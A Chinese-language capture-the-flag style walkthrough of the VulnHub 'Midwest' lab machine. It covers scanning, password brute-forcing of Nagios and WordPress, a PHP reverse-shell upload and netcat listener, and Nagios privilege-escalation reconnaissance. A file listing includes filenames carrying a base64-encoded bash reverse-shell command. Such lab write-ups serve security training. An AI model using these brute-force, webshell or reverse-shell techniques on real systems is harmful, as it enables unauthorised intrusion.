靶机渗透练习107-Midwest: 1.0.1
靶机描述
靶机地址:https://www.vulnhub.com/entry/midwest-101,692/
Description
N/A
Heads up - A bit of brute force is required
This works better with VirtualBox rather than VMware ## Changelog - 1.0.1 - 2021-06-19 - 1.0.0 - 2021-05-03
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.11.130
靶机:
IP地址:192.168.11.133
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
- Kali设置为双网卡,网卡eth0设置为仅主机模式
- 本机上将两个网卡进行桥接
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.133 0a:00:27:00:00:12 (Unknown: locally administered)
192.168.11.139 08:00:27:47:56:ed PCS Systemtechnik GmbH
192.168.11.254 00:50:56:e0:d0:c8 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.11.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.11.0/24
方法四、fping -aqg 指定网段
fping -aqg 192.168.11.0/24
方法五、待补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# nmap -A -sV -T4 -p- 192.168.11.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 16:09 CST
Nmap scan report for 192.168.11.139
Host is up (0.00050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 31:62:bb:fc:87:9a:39:01:96:54:03:18:bb:03:bc:90 (RSA)
| 256 4d:21:68:a0:58:a4:18:27:ba:bd:29:ba:a7:91:bc:35 (ECDSA)
|_ 256 77:ce:55:b4:87:93:dc:4c:05:6e:67:90:3f:78:d0:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Midwest Power – Powering the future!
|_http-generator: WordPress 5.6
MAC Address: 08:00:27:47:56:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.11.139
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.35 seconds
目前看就开了个22和80端口,80是WordPress 5.6
2.2 枚举漏洞
2.2.1 22端口分析
暂时没有比较好的字典
2.2.2 80端口分析
访问:http://192.168.11.139/发现会自动跳转到:www.midwest.htb
加一下hosts访问:http://www.midwest.htb/
目录扫描一下看看
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# gobuster dir -u http://www.midwest.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://www.midwest.htb/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 280]
/index.php (Status: 301) [Size: 0] [--> http://www.midwest.htb/]
/.php (Status: 403) [Size: 280]
/wp-content (Status: 301) [Size: 323] [--> http://www.midwest.htb/wp-content/]
/wp-login.php (Status: 200) [Size: 7202]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 324] [--> http://www.midwest.htb/wp-includes/]
/javascript (Status: 301) [Size: 323] [--> http://www.midwest.htb/javascript/]
/readme.html (Status: 200) [Size: 7278]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 321] [--> http://www.midwest.htb/wp-admin/]
Progress: 138654 / 1102805 (12.57%)[ERROR] Get "http://www.midwest.htb/xmlrpc.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/nagios (Status: 401) [Size: 462]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/wp-signup.php (Status: 302) [Size: 0] [--> http://www.midwest.htb/wp-login.php?action=register]
/server-status (Status: 403) [Size: 280]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
常见的WP目录结构,有个特殊目录nagios报错401了
状态码 401 Unauthorized 代表客户端错误,指的是由于缺乏目标资源要求的身份验证凭证,发送的请求未得到满足。
这个状态码会与 WWW-Authenticate 首部一起发送,其中包含有如何进行验证的信息。
这个状态类似于 403,但是在该情况下,依然可以进行身份验证。
很明显这个nagios被拦截了
搜一下
Nagios是一款开源免费(也有收费版的Nagios XI)的监控工具,可以用以监控Windows、Linux、Unix、Router、Switch,可以监控指定主机的物理基础资源或服务,当被监控对象健康状态“变好”或者“变坏”的时候,可以通过邮件、短信等方式通知到相关管理人员或运维人员。
这里有一个默认用户名:
nagiosadmin
先访问一波看看:www.midwest.htb/nagios
尝试爆破一下密码,先放着爆破一下,趁着爆破的时间拿wpscan去扫描一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# hydra -l nagiosadmin -P /usr/share/wordlists/rockyou.txt http-get://www.midwest.htb/nagios -t 64
wpscan扫描一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# wpscan --url http://www.midwest.htb/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.midwest.htb/ [192.168.11.139]
[+] Started: Mon Apr 8 16:15:30 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.midwest.htb/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.midwest.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.midwest.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.midwest.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Insecure, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://www.midwest.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.6</generator>
| - http://www.midwest.htb/?feed=rss2&page_id=2, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: ecocoded
| Location: http://www.midwest.htb/wp-content/themes/ecocoded/
| Last Updated: 2023-08-04T00:00:00.000Z
| Readme: http://www.midwest.htb/wp-content/themes/ecocoded/readme.txt
| [!] The version is out of date, the latest version is 4.6
| Style URL: http://www.midwest.htb/wp-content/themes/ecocoded/style.css?ver=5.6
| Style Name: EcoCoded
| Style URI: https://superbthemes.com/ecocoded/ecocoded-info/
| Description: The Internet contributes two percent of global carbon emissions. The internet is beautiful but data ...
| Author: themeeverest
| Author URI: https://superbthemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.midwest.htb/wp-content/themes/ecocoded/style.css?ver=5.6, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Apr 8 16:15:32 2024
[+] Requests Done: 54
[+] Cached Requests: 8
[+] Data Sent: 13.437 KB
[+] Data Received: 235.42 KB
[+] Memory used: 168.473 MB
[+] Elapsed time: 00:00:01
发现用户admin
爆破半天没反应,尝试其他方式
cewl http://www.midwest.htb/ > pass.txt
再基于这个做一个字典
john -rules -wordlist=pass.txt --stdout | sort | uniq > wordlist.txt
然后再爆破一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# hydra -l nagiosadmin -P wordlist.txt http-get://www.midwest.htb/nagios -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-08 18:51:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 6430 login tries (l:1/p:6430), ~101 tries per task
[DATA] attacking http-get://www.midwest.htb:80/nagios
[80][http-get] host: www.midwest.htb login: nagiosadmin password: PowerPower
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-08 18:52:16
成功爆破出:PowerPower
再爆破一下wp的密码
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# wpscan --url http://www.midwest.htb/ -U user.txt -P wordlist.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.midwest.htb/ [192.168.11.139]
[+] Started: Mon Apr 8 18:53:02 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.midwest.htb/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.midwest.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.midwest.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.midwest.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Insecure, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://www.midwest.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.6</generator>
| - http://www.midwest.htb/?feed=rss2&page_id=2, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: ecocoded
| Location: http://www.midwest.htb/wp-content/themes/ecocoded/
| Last Updated: 2023-08-04T00:00:00.000Z
| Readme: http://www.midwest.htb/wp-content/themes/ecocoded/readme.txt
| [!] The version is out of date, the latest version is 4.6
| Style URL: http://www.midwest.htb/wp-content/themes/ecocoded/style.css?ver=5.6
| Style Name: EcoCoded
| Style URI: https://superbthemes.com/ecocoded/ecocoded-info/
| Description: The Internet contributes two percent of global carbon emissions. The internet is beautiful but data ...
| Author: themeeverest
| Author URI: https://superbthemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.midwest.htb/wp-content/themes/ecocoded/style.css?ver=5.6, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / Power9
Trying admin / Power9 Time: 00:01:00 <================================================================ > (4385 / 10815) 40.54% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: Power9
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Apr 8 18:54:06 2024
[+] Requests Done: 4558
[+] Cached Requests: 5
[+] Data Sent: 2.285 MB
[+] Data Received: 2.794 MB
[+] Memory used: 329.449 MB
[+] Elapsed time: 00:01:04
成功拿到密码Power9
登录后台,通过插件安装上传webshell,最后通过 Media Library可获取上传文件路径
http://www.midwest.htb/wp-content/uploads/2024/04/php-reverse-shell.php
kali本地监听,然后访问webshell即可getshel
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [192.168.11.130] from www.midwest.htb [192.168.11.139] 36864
Linux midwest 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
04:19:37 up 1:12, 0 users, load average: 3.05, 3.40, 3.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp)
/bin/sh: 0: can't access tty; job control turned off
$
2.3 权限提升
先做一波信息收集
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp)
$ ls -al
total 72
drwxr-xr-x 19 root root 4096 Jan 22 2021 .
drwxr-xr-x 19 root root 4096 Jan 22 2021 ..
lrwxrwxrwx 1 root root 7 Jan 22 2021 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jan 22 2021 boot
drwxr-xr-x 17 root root 3180 Apr 8 03:07 dev
drwxr-xr-x 98 root root 4096 Apr 8 04:11 etc
drwxr-xr-x 3 root root 4096 Jan 22 2021 home
lrwxrwxrwx 1 root root 31 Jan 22 2021 initrd.img -> boot/initrd.img-4.19.0-13-amd64
lrwxrwxrwx 1 root root 31 Jan 22 2021 initrd.img.old -> boot/initrd.img-4.19.0-13-amd64
lrwxrwxrwx 1 root root 7 Jan 22 2021 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jan 22 2021 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jan 22 2021 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jan 22 2021 libx32 -> usr/libx32
drwx------ 2 root root 16384 Jan 22 2021 lost+found
drwxr-xr-x 3 root root 4096 Jan 22 2021 media
drwxr-xr-x 2 root root 4096 Jan 22 2021 mnt
drwxr-xr-x 2 root root 4096 Jan 22 2021 opt
dr-xr-xr-x 175 root root 0 Apr 8 03:07 proc
drwx------ 5 root root 4096 Jan 23 2021 root
drwxr-xr-x 21 root root 640 Apr 8 03:07 run
lrwxrwxrwx 1 root root 8 Jan 22 2021 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Jan 22 2021 srv
drwxr-xr-x 3 root root 4096 Jan 22 2021 store
dr-xr-xr-x 13 root root 0 Apr 8 03:07 sys
drwxrwxrwt 2 root root 4096 Apr 8 04:05 tmp
drwxr-xr-x 13 root root 4096 Jan 22 2021 usr
drwxr-xr-x 13 root root 4096 Jan 22 2021 var
lrwxrwxrwx 1 root root 28 Jan 22 2021 vmlinuz -> boot/vmlinuz-4.19.0-13-amd64
lrwxrwxrwx 1 root root 28 Jan 22 2021 vmlinuz.old -> boot/vmlinuz-4.19.0-13-amd64
$ cd /home
$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Jan 22 2021 .
drwxr-xr-x 19 root root 4096 Jan 22 2021 ..
drwxrwx--- 3 nagios nagios 4096 Jan 23 2021 nagios
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/bash
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:108:116::/nonexistent:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
Debian-exim:x:110:118::/var/spool/exim4:/usr/sbin/nologin
uuidd:x:111:119::/run/uuidd:/usr/sbin/nologin
openldap:x:112:120:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
Debian-snmp:x:113:121::/var/lib/snmp:/bin/false
snmptt:x:114:122:SNMP Trap Translator,,,:/var/spool/snmptt:/usr/sbin/nologin
shellinabox:x:115:123:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin
由于getshell的用户是www-data,权限太低了,需要先提权到nagios
2.3.1 提权nagios
由于前边知晓nagios是一个监控系统,而且根据安装文档可以
$ ls /usr/local/nagios/
bin
etc
libexec
sbin
share
var
$ find / -type f -writable 2> /dev/null | grep -v /var/www | grep -v /proc | grep /usr/local/nagios/
/usr/local/nagios/etc/hosttemplates.cfg
/usr/local/nagios/etc/hostextinfo.cfg
/usr/local/nagios/etc/ndo.cfg
/usr/local/nagios/etc/contacts.cfg
/usr/local/nagios/etc/servicegroups.cfg
/usr/local/nagios/etc/static/xitemplates.cfg
/usr/local/nagios/etc/static/xitest.cfg
/usr/local/nagios/etc/static/xiobjects.cfg
/usr/local/nagios/etc/contacttemplates.cfg
/usr/local/nagios/etc/servicetemplates.cfg
/usr/local/nagios/etc/nrpe.cfg
/usr/local/nagios/etc/services/localhost.cfg
/usr/local/nagios/etc/pnp/npcd.cfg
/usr/local/nagios/etc/pnp/pages/web_traffic.cfg-sample
/usr/local/nagios/etc/pnp/check_commands/check_nwstat.cfg-sample
/usr/local/nagios/etc/pnp/background.pdf
/usr/local/nagios/etc/pnp/pnp4nagios_release
/usr/local/nagios/etc/pnp/npcd.cfg-sample
/usr/local/nagios/etc/pnp/rra.cfg
/usr/local/nagios/etc/pnp/rra.cfg-sample
/usr/local/nagios/etc/pnp/config.php
/usr/local/nagios/etc/contactgroups.cfg
/usr/local/nagios/etc/resource.cfg
/usr/local/nagios/etc/serviceextinfo.cfg
/usr/local/nagios/etc/nagios.cfg
/usr/local/nagios/etc/nsca.cfg
/usr/local/nagios/etc/hostescalations.cfg
/usr/local/nagios/etc/commands.cfg
/usr/local/nagios/etc/cgi.cfg
/usr/local/nagios/etc/recurringdowntime.cfg
/usr/local/nagios/etc/hostgroups.cfg
/usr/local/nagios/etc/timeperiods.cfg
/usr/local/nagios/etc/send_nsca.cfg
/usr/local/nagios/etc/hostdependencies.cfg
/usr/local/nagios/etc/hosts/localhost.cfg
/usr/local/nagios/etc/servicedependencies.cfg
/usr/local/nagios/etc/serviceescalations.cfg
/usr/local/nagios/libexec/check_ssl_validity
/usr/local/nagios/libexec/check_snmp_win.pl
/usr/local/nagios/libexec/check_email_loop.pl
/usr/local/nagios/libexec/check_snmp_int.pl
/usr/local/nagios/libexec/check_http
/usr/local/nagios/libexec/check_docker.py
/usr/local/nagios/libexec/check_snmp_vrrp.pl
/usr/local/nagios/libexec/check_tcp
/usr/local/nagios/libexec/check_log
/usr/local/nagios/libexec/check_nagiosxiserver.php
/usr/local/nagios/libexec/check_oracle
/usr/local/nagios/libexec/check_snmp_cpfw.pl
/usr/local/nagios/libexec/check_fping
/usr/local/nagios/libexec/check_domain.php
/usr/local/nagios/libexec/check_cluster
/usr/local/nagios/libexec/check_json.php
/usr/local/nagios/libexec/check_email_delivery_epn
/usr/local/nagios/libexec/check_nagioslogserver.php
/usr/local/nagios/libexec/check_ntp_peer
/usr/local/nagios/libexec/check_yum
/usr/local/nagios/libexec/check_snmp_linkproof_nhr.pl
/usr/local/nagios/libexec/send_nsca
/usr/local/nagios/libexec/check_capacity_planning.py
/usr/local/nagios/libexec/check_dir
/usr/local/nagios/libexec/check_flexlm
/usr/local/nagios/libexec/check_sensors
/usr/local/nagios/libexec/check_mssql
/usr/local/nagios/libexec/check_s3.py
/usr/local/nagios/libexec/check_xi_sla.php
/usr/local/nagios/libexec/check_nwstat
/usr/local/nagios/libexec/check_snmp_load_wizard.pl
/usr/local/nagios/libexec/check_breeze
/usr/local/nagios/libexec/check_netstat.pl
/usr/local/nagios/libexec/check_load
/usr/local/nagios/libexec/check_sip
/usr/local/nagios/libexec/check_init_service
/usr/local/nagios/libexec/check_mongodb.py
/usr/local/nagios/libexec/check_mysql_query
/usr/local/nagios/libexec/check_webinject.sh
/usr/local/nagios/libexec/check_snmp
/usr/local/nagios/libexec/check_snmp_css_main.pl
/usr/local/nagios/libexec/check_mrtgtraf
/usr/local/nagios/libexec/check_snmp_env.pl
/usr/local/nagios/libexec/check_nt
/usr/local/nagios/libexec/check_em01.pl
/usr/local/nagios/libexec/check_bl
/usr/local/nagios/libexec/check_ldap
/usr/local/nagios/libexec/check_time
/usr/local/nagios/libexec/check_services
/usr/local/nagios/libexec/check_em08
/usr/local/nagios/libexec/check_disk_smb
/usr/local/nagios/libexec/check_postgres.pl
/usr/local/nagios/libexec/folder_watch.pl
/usr/local/nagios/libexec/check_vmware_api.pl
/usr/local/nagios/libexec/check_win_snmp_disk.pl
/usr/local/nagios/libexec/urlize
/usr/local/nagios/libexec/check_cpu_stats.sh
/usr/local/nagios/libexec/check_snmp_storage_wizard.pl
/usr/local/nagios/libexec/remove_perfdata
/usr/local/nagios/libexec/check_rpc
/usr/local/nagios/libexec/check_smtp_send
/usr/local/nagios/libexec/check_nna.py
/usr/local/nagios/libexec/check_email_delivery
/usr/local/nagios/libexec/check_wmi_plus.conf
/usr/local/nagios/libexec/check_ifoperstatus
/usr/local/nagios/libexec/check_snmp_nsbox.pl
/usr/local/nagios/libexec/check_ftp_fully
/usr/local/nagios/libexec/check_imap_receive
/usr/local/nagios/libexec/check_mssql_server.php
/usr/local/nagios/libexec/custom_check_mem
/usr/local/nagios/libexec/check_rrdtraf.php
/usr/local/nagios/libexec/check_mountpoints.sh
/usr/local/nagios/libexec/check_apt
/usr/local/nagios/libexec/;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
/usr/local/nagios/libexec/check_wave
/usr/local/nagios/libexec/check_wlsagent.sh
/usr/local/nagios/libexec/check_users
/usr/local/nagios/libexec/check_ntp_time
/usr/local/nagios/libexec/check_snmp_process_wizard.pl
/usr/local/nagios/libexec/check_dummy
/usr/local/nagios/libexec/check_nagios
/usr/local/nagios/libexec/check_ups
/usr/local/nagios/libexec/check_asterisk_sip_peers.sh
/usr/local/nagios/libexec/check_pgsql
/usr/local/nagios/libexec/check_ping
/usr/local/nagios/libexec/utils.pm
/usr/local/nagios/libexec/check_real
/usr/local/nagios/libexec/check_ifstatus
/usr/local/nagios/libexec/check_bpi.php
/usr/local/nagios/libexec/custom_check_procs
/usr/local/nagios/libexec/check_pnp_rrds.pl
/usr/local/nagios/libexec/check_uptime
/usr/local/nagios/libexec/check_ide_smart
/usr/local/nagios/libexec/check_wmi_plus.pl
/usr/local/nagios/libexec/check_snmp_generic.pl
/usr/local/nagios/libexec/check_nrpe
/usr/local/nagios/libexec/check_snmp_css.pl
/usr/local/nagios/libexec/check_esx3.pl
/usr/local/nagios/libexec/check_by_ssh
/usr/local/nagios/libexec/check_snmp_storage.pl
/usr/local/nagios/libexec/check_snmp_load.pl
/usr/local/nagios/libexec/check_mysql_health
/usr/local/nagios/libexec/check_asterisk.pl
/usr/local/nagios/libexec/check_imap_receive_epn
/usr/local/nagios/libexec/check_mailq
/usr/local/nagios/libexec/check_procs
/usr/local/nagios/libexec/check_nagios_performance.php
/usr/local/nagios/libexec/check_ntp
/usr/local/nagios/libexec/check_mrtg
/usr/local/nagios/libexec/check_smtp_send_epn
/usr/local/nagios/libexec/check_hpjd
/usr/local/nagios/libexec/check_rrdtraf
/usr/local/nagios/libexec/check_open_files.pl
/usr/local/nagios/libexec/check_snmp_boostedge.pl
/usr/local/nagios/libexec/check_tftp.sh
/usr/local/nagios/libexec/check_snmp_process.pl
/usr/local/nagios/libexec/check_jvm.jar
/usr/local/nagios/libexec/check_xml.php
/usr/local/nagios/libexec/negate
/usr/local/nagios/libexec/check_disk
/usr/local/nagios/libexec/check_ec2.py
/usr/local/nagios/libexec/check_wmi_plus.ini
/usr/local/nagios/libexec/check_ircd
/usr/local/nagios/libexec/;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
/usr/local/nagios/libexec/check_radius.py
/usr/local/nagios/libexec/check_overcr
/usr/local/nagios/libexec/check_ssh
/usr/local/nagios/libexec/check_snmp_mem.pl
/usr/local/nagios/libexec/check_smtp
/usr/local/nagios/libexec/check_dig
/usr/local/nagios/libexec/check_file_age
/usr/local/nagios/libexec/check_ifoperstatnag
/usr/local/nagios/libexec/check_wmi_plus_help.pl
/usr/local/nagios/libexec/check_mysql
/usr/local/nagios/libexec/check_ncpa.py
/usr/local/nagios/libexec/utils.sh
/usr/local/nagios/libexec/check_swap
/usr/local/nagios/libexec/check_dns
我们先检查一下nagios配置文件有没有可以利用的信息
$ cat cgi.cfg
# MODIFIED
default_statusmap_layout=6
# UNMODIFIED
action_url_target=_blank
authorized_for_all_host_commands=nagiosadmin
authorized_for_all_hosts=nagiosadmin
authorized_for_all_service_commands=nagiosadmin
authorized_for_all_services=nagiosadmin
authorized_for_configuration_information=nagiosadmin
authorized_for_system_commands=nagiosadmin
authorized_for_system_information=nagiosadmin
default_statuswrl_layout=4
escape_html_tags=1
lock_author_names=1
main_config_file=/usr/local/nagios/etc/nagios.cfg
notes_url_target=_blank
physical_html_path=/usr/local/nagios/share
ping_syntax=/bin/ping -n -U -c 5 $HOSTADDRESS$
